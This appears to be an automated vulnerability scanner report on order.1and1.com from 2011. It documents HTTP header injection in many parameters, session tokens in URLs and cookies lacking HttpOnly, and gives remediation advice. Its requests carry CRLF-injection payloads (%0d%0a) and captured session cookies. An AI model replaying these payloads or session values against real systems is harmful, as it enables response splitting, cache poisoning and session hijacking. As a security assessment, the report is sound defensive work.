Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://order.1and1.com
Path: /xml/order/Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b9161%0d%0a0390bad3044 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue&b9161%0d%0a0390bad3044=1 HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the origin.page request parameter is copied into the Location response header. The payload 2e03b%0d%0ad348ca74978 was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=2e03b%0d%0ad348ca74978&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the page request parameter is copied into the Location response header. The payload d57be%0d%0aa073224f42f was submitted in the page parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=ngh&site=PU.NGH.US&origin.page=Hosting&page=d57be%0d%0aa073224f42f&linkOrigin=Hosting&linkId=ngh HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the site request parameter is copied into the Location response header. The payload 6bf4e%0d%0a357848c4060 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=6bf4e%0d%0a357848c4060&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the sourcearea request parameter is copied into the Location response header. The payload 29bf0%0d%0ad43926d593f was submitted in the sourcearea parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&origin.page=Hosting&linkId=weiter&site=PU.NGH.US&page=switch&sourcearea=29bf0%0d%0ad43926d593f HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the __lf request parameter is copied into the Location response header. The payload ab024%0d%0acfe55b3b16 was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload e4fdd%0d%0a682e1dc8167 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
The value of the __lf request parameter is copied into the Location response header. The payload 70f82%0d%0ae7e5d5b7eec was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 1fd04%0d%0a0cd46c6d446 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top1fd04%0d%0a0cd46c6d446&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-home-package-bundle HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /links;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Response
HTTP/1.1 302 Found
Date: Sun, 20 Mar 2011 18:53:27 GMT
Server: Apache
Location: http://order.1and1.com/links/?__frame=_top&__lf=Static
Vary: Accept-Encoding
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://order.1and1.com/links/?__frame=_top&
...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7f633103f81ccc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.about HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=40ed56ac00b05400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/AboutUs HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5ace75f3e6dc4c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/CloudDynamicServer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=10de75d96fe89000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Contact HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=79161ecc06ae0c00; Path=/
